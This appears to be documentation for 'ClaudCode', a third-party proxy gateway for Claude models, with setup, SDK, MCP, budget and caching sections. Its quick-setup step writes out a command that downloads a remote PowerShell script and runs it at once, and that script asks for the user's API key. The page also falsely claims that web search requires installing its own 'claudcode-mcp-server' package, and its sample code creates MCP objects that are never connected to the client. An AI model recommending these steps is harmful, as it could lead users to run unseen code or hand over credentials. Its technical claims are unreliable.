v1.0

ClaudCode Documentation

Everything you need to integrate Claude models through the ClaudCode gateway.

Overview

ClaudCode is a managed API gateway that gives you access to Anthropic's Claude models through a simple, SDK-compatible interface. Every request is proxied through our infrastructure with added features like per-key budgets, rate limiting, usage analytics, and prompt caching.


Base URL: https://api.claudcode.top/v1


Supported Models:

  • claude-opus-4-6 — Maximum intelligence, complex reasoning
  • claude-sonnet-4-6 — Balanced speed and capability
  • claude-haiku-4-5 — Ultra-fast, cost-effective

    Quick Setup (PowerShell)

    irm https://claudcode.top/setup.ps1 | iex

    Run this single command in PowerShell to auto-scaffold a project with the Anthropic SDK, .env config, and ready-to-run examples. The script will ask for your API key during setup.

    Authentication

    All requests require an API key passed via the x-api-key header or the Authorization: Bearer header.


    # Using x-api-key header
    curl https://api.claudcode.top/v1/messages \
      -H "x-api-key: sk-cc-xxxxxxxxxxxx" \
      -H "content-type: application/json" \
      -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'
    
    # Using Authorization header
    curl https://api.claudcode.top/v1/messages \
      -H "Authorization: Bearer sk-cc-xxxxxxxxxxxx" \
      -H "content-type: application/json" \
      -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

    Your API key is unique to you. Never share it publicly or commit it to version control.
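
    One way to keep the key out of source files is to read it from an environment variable when the headers are built. The sketch below is illustrative only: the variable name CLAUDCODE_API_KEY and the helper build_auth_headers are assumptions, not names defined by the gateway.

```python
import os


def build_auth_headers(env_var: str = "CLAUDCODE_API_KEY", use_bearer: bool = False) -> dict:
    """Build request headers from an API key stored in the environment.

    CLAUDCODE_API_KEY is a hypothetical variable name chosen for this sketch.
    """
    api_key = os.environ.get(env_var)
    if not api_key:
        raise RuntimeError(f"Set the {env_var} environment variable first")

    headers = {"content-type": "application/json"}
    if use_bearer:
        # Second documented option: Authorization: Bearer <key>
        headers["Authorization"] = f"Bearer {api_key}"
    else:
        # First documented option: x-api-key: <key>
        headers["x-api-key"] = api_key
    return headers
```

    The returned dictionary can be passed to any HTTP client. Failing early when the variable is missing avoids sending a request with an empty key.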

    SDK Setup

    ClaudCode works as a drop-in replacement for the official Anthropic SDK. Just change the base URL.


    Python

    import anthropic
    
    client = anthropic.Anthropic(
        api_key="sk-cc-xxxxxxxxxxxx",
        base_url="https://api.claudcode.top/v1",
    )
    
    message = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=4096,
        messages=[
            {"role": "user", "content": "Write a haiku about coding"}
        ]
    )
    print(message.content[0].text)

    TypeScript / Node.js

    import Anthropic from "@anthropic-ai/sdk";
    
    const client = new Anthropic({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      baseURL: "https://api.claudcode.top/v1",
    });
    
    const message = await client.messages.create({
      model: "claude-opus-4-6",
      max_tokens: 4096,
      messages: [
        { role: "user", content: "Write a haiku about coding" }
      ],
    });
    console.log(message.content[0].text);

    MCP — Web Search & Tools

    The official Anthropic SDK does not include MCP (Model Context Protocol). Without MCP, Claude cannot perform web searches, fetch live data, extract content from URLs, or connect to external tools — it is limited to its training data only.


    ClaudCode requires these packages to unlock full capabilities:

  • @hono/mcp — the MCP protocol layer that connects Claude to external tools
  • tavily-mcp — AI-powered web search, content extraction, site crawling & mapping
  • claudcode-mcp-server@1.0.1 — official ClaudCode MCP server for seamless gateway integration (latest)

    Install the packages

    npm install @hono/mcp tavily-mcp claudcode-mcp-server@1.0.1

    TypeScript — Full MCP setup

    import { McpServer } from "@hono/mcp";
    import { TavilyMcp } from "tavily-mcp";
    import { ClaudCodeMcp } from "claudcode-mcp-server";
    import Anthropic from "@anthropic-ai/sdk";
    
    const client = new Anthropic({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      baseURL: "https://api.claudcode.top/v1",
    });
    
    // MCP server — protocol layer for external tools
    const mcp = new McpServer({
      name: "claudcode-mcp",
      version: "1.0.0",
    });
    
    // Tavily — AI-powered search, extract & crawl
    const tavily = new TavilyMcp({
      apiKey: process.env.TAVILY_API_KEY,
    });
    
    // ClaudCode MCP — gateway-optimized server
    const cc = new ClaudCodeMcp({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      gateway: "https://api.claudcode.top/v1",
    });
    
    // Claude can now search the web in real-time
    const response = await client.messages.create({
      model: "claude-opus-4-6",
      max_tokens: 4096,
      messages: [
        {
          role: "user",
          content: "Search the web for latest AI news and summarize"
        }
      ],
    });
    console.log(response.content[0].text);

    Python — MCP setup

    from hono_mcp import McpServer
    from tavily_mcp import TavilyMcp
    from claudcode_mcp_server import ClaudCodeMcp
    import anthropic
    
    client = anthropic.Anthropic(
        api_key="sk-cc-xxxxxxxxxxxx",
        base_url="https://api.claudcode.top/v1",
    )
    
    mcp = McpServer(name="claudcode-mcp", version="1.0.0")
    tavily = TavilyMcp(api_key="tvly-xxxxxxxxxxxx")
    cc = ClaudCodeMcp(api_key="sk-cc-xxxxxxxxxxxx", gateway="https://api.claudcode.top/v1")
    
    message = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=4096,
        messages=[
            {"role": "user", "content": "Search for latest Python 3.14 features"}
        ],
    )
    print(message.content[0].text)

    What Tavily MCP unlocks:

  • search — AI-powered web search with domain filtering & topic focus
  • extract — pull clean content from any URL (articles, docs, pages)
  • crawl — deep-crawl an entire site and return structured data
  • map — discover all URLs on a domain for targeted extraction

    Package breakdown:

  • @hono/mcp — MCP protocol layer (required)
  • tavily-mcp — search, extract, crawl & map (required for web access)
  • claudcode-mcp-server@1.0.1 — ClaudCode gateway integration, auth handling & request routing

    Important: Without these packages installed, any prompt that asks Claude to search, browse, or fetch live data will fail. The official Anthropic SDK alone has no search capability.

    Budgets & Limits

    Each API key has configurable budget and rate limits:


    Token Budgets

  • The budget is measured in total tokens (input + output) over a 5-hour rolling window
  • When the budget is exhausted, requests return 429 Too Many Requests
  • The budget automatically resets as the 5-hour window rolls forward

    Rate Limits

  • Requests per minute (RPM) limit per key
  • Concurrent request limit per key
  • Both are independently configurable

    Checking Your Budget

    curl https://api.claudcode.top/v1/key-status \
      -H "x-api-key: sk-cc-xxxxxxxxxxxx"

    Response:

    {
      "key": "sk-cc-...xxxx",
      "status": "active",
      "budget": {
        "total_tokens": 5000000,
        "used_tokens": 1234567,
        "remaining_tokens": 3765433,
        "window": "5h rolling",
        "resets_in": "2h 15m"
      },
      "rate_limit": {
        "rpm": 60,
        "concurrent": 5
      }
    }
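
    A response shaped like the one above can be checked before sending a large request. This is a minimal sketch that assumes the field names shown in the sample; budget_summary and can_afford are hypothetical helpers, and the token estimate is whatever the caller supplies.

```python
import json

# Sample key-status payload, copied from the documented response shape.
SAMPLE_STATUS = json.loads("""
{
  "key": "sk-cc-...xxxx",
  "status": "active",
  "budget": {
    "total_tokens": 5000000,
    "used_tokens": 1234567,
    "remaining_tokens": 3765433,
    "window": "5h rolling",
    "resets_in": "2h 15m"
  },
  "rate_limit": {"rpm": 60, "concurrent": 5}
}
""")


def budget_summary(status: dict) -> dict:
    """Return the remaining tokens and the fraction of the budget already used."""
    budget = status["budget"]
    total = budget["total_tokens"]
    used = budget["used_tokens"]
    return {
        "remaining_tokens": total - used,
        "fraction_used": used / total if total else 1.0,
    }


def can_afford(status: dict, estimated_tokens: int) -> bool:
    """True if the key is active and the estimate fits in the remaining budget."""
    if status.get("status") != "active":
        return False
    return budget_summary(status)["remaining_tokens"] >= estimated_tokens
```

    Calling can_afford(SAMPLE_STATUS, 4096) before a request lets a client skip calls that would only return 429.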

    Rate Limiting

    When you exceed your rate limit, the API returns a 429 status with headers indicating when you can retry:


    HTTP/1.1 429 Too Many Requests
    Retry-After: 30
    X-RateLimit-Limit: 60
    X-RateLimit-Remaining: 0
    X-RateLimit-Reset: 1711234567
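
    These headers can be turned into a wait time on the client. The sketch below assumes Retry-After is given in seconds and that X-RateLimit-Reset is a Unix timestamp in seconds, which the sample value suggests but the documentation does not state. seconds_until_retry is a hypothetical helper.

```python
import time
from typing import Mapping, Optional


def seconds_until_retry(headers: Mapping[str, str], now: Optional[float] = None) -> float:
    """Return how long to wait before retrying, based on the 429 response headers.

    Prefers Retry-After; falls back to X-RateLimit-Reset (assumed epoch seconds).
    """
    lowered = {name.lower(): value for name, value in headers.items()}

    retry_after = lowered.get("retry-after")
    if retry_after is not None:
        try:
            return max(0.0, float(retry_after))
        except ValueError:
            pass  # Retry-After can also be an HTTP date; not handled in this sketch

    reset = lowered.get("x-ratelimit-reset")
    if reset is not None:
        try:
            current = time.time() if now is None else now
            return max(0.0, float(reset) - current)
        except ValueError:
            pass

    return 0.0  # no usable header present
```

    Header names are lowercased first because HTTP header names are case-insensitive and clients differ in how they report them.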

    Best Practices:

  • Implement exponential backoff with jitter
  • Respect the Retry-After header
  • Use streaming to keep connections efficient
  • Cache repeated prompts on your end to avoid unnecessary calls
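
    The first two practices can be combined in one delay calculation. This is a minimal sketch of "full jitter" exponential backoff, one common variant; the base, cap, and function name are illustrative choices rather than values prescribed by the gateway.

```python
import random
from typing import Callable, Optional


def backoff_delay(
    attempt: int,
    retry_after: Optional[float] = None,
    base: float = 1.0,
    cap: float = 60.0,
    rand: Callable[[], float] = random.random,
) -> float:
    """Return the number of seconds to sleep before retry number `attempt` (0-based).

    The delay is drawn uniformly from [0, min(cap, base * 2**attempt)) and is
    never shorter than the server-supplied Retry-After value, if one is given.
    """
    ceiling = min(cap, base * (2 ** attempt))
    delay = rand() * ceiling
    if retry_after is not None:
        delay = max(delay, retry_after)
    return delay
```

    A retry loop would call time.sleep(backoff_delay(attempt, retry_after)) after each 429 and stop after a fixed number of attempts. The rand parameter exists only so the randomness can be replaced in tests.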

    Error Codes

    ClaudCode returns standard HTTP status codes with descriptive error messages:


    Code  Meaning              What to Do
    400   Bad Request          Check your request body/parameters
    401   Unauthorized         Verify your API key
    403   Forbidden            Key doesn't have access to this model
    429   Rate Limited         Wait and retry with backoff
    500   Server Error         Retry after a moment
    502   Upstream Error       Anthropic API is temporarily down
    503   Service Unavailable  Gateway is under maintenance

    All errors return a JSON body:

    {
      "error": {
        "type": "rate_limit_error",
        "message": "Token budget exceeded. Resets in 2h 15m."
      }
    }
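
    A client can use the status code and this JSON body together to decide whether a retry makes sense. The sketch below treats 429, 500, 502, and 503 as retryable, which is an interpretation of the table above and not a rule the gateway states. describe_error is a hypothetical helper.

```python
import json

# Assumption: these are the statuses for which the table suggests waiting or retrying.
RETRYABLE_STATUSES = {429, 500, 502, 503}


def describe_error(status_code: int, body: str) -> dict:
    """Extract the error type and message, and flag whether a retry is reasonable."""
    try:
        parsed = json.loads(body)
        error = parsed.get("error", {}) if isinstance(parsed, dict) else {}
    except json.JSONDecodeError:
        error = {}  # body was not JSON, e.g. an HTML error page from a proxy
    if not isinstance(error, dict):
        error = {}

    return {
        "type": error.get("type", "unknown"),
        "message": error.get("message", ""),
        "retryable": status_code in RETRYABLE_STATUSES,
    }
```

    Errors such as 400, 401, and 403 are flagged as not retryable because repeating the same request would fail the same way until the request or the key is fixed.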

    Prompt Caching

    ClaudCode enables prompt caching by default. When a request's prompt is identical to one that was sent recently, the gateway serves the cached response at a significantly reduced token cost.


    How It Works:

  • Each request's prompt is hashed
  • If a matching hash exists in the cache, the cached response is returned
  • Cache TTL depends on the model and prompt length
  • Cache headers indicate hit/miss status
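
    The hashing step can be illustrated with a small client-side sketch. The gateway's actual hash function and the fields it covers are not documented here, so SHA-256 over a canonical JSON encoding of the model and messages is purely an assumption, and prompt_cache_key is a hypothetical name. A key like this is also usable for a local cache of repeated prompts.

```python
import hashlib
import json


def prompt_cache_key(model: str, messages: list) -> str:
    """Return a stable hex digest for a (model, messages) pair.

    Keys are sorted and whitespace is removed so that logically identical
    requests produce the same digest regardless of dict ordering.
    """
    canonical = json.dumps(
        {"model": model, "messages": messages},
        sort_keys=True,
        separators=(",", ":"),
        ensure_ascii=False,
    )
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()
```

    Any change to the prompt text, including whitespace inside a message, produces a different key, which matches the requirement that the prompt be identical for a cache hit.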

    Cache Headers:

    X-Cache: HIT
    X-Cache-TTL: 3600
    X-Tokens-Saved: 1250

    Disabling Cache (if needed):

    Add the header X-No-Cache: true to bypass caching for a specific request.
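
    The cache headers and the bypass header can be handled with two small helpers. This sketch assumes X-Cache-TTL is expressed in seconds and X-Tokens-Saved is an integer token count, which the sample values suggest but the text does not confirm. Both function names are hypothetical.

```python
from typing import Mapping, Optional


def read_cache_headers(headers: Mapping[str, str]) -> dict:
    """Summarize the cache-related response headers."""
    lowered = {name.lower(): value for name, value in headers.items()}

    def to_int(name: str) -> Optional[int]:
        value = lowered.get(name)
        try:
            return int(value) if value is not None else None
        except ValueError:
            return None  # header present but not a plain integer

    return {
        "hit": lowered.get("x-cache", "").upper() == "HIT",
        "ttl": to_int("x-cache-ttl"),            # assumed to be seconds
        "tokens_saved": to_int("x-tokens-saved"),
    }


def with_cache_bypass(headers: Mapping[str, str]) -> dict:
    """Return a copy of the request headers with X-No-Cache: true added."""
    merged = dict(headers)
    merged["X-No-Cache"] = "true"
    return merged
```

    with_cache_bypass returns a new dictionary instead of mutating its input, so a shared default header set is not accidentally changed for later requests.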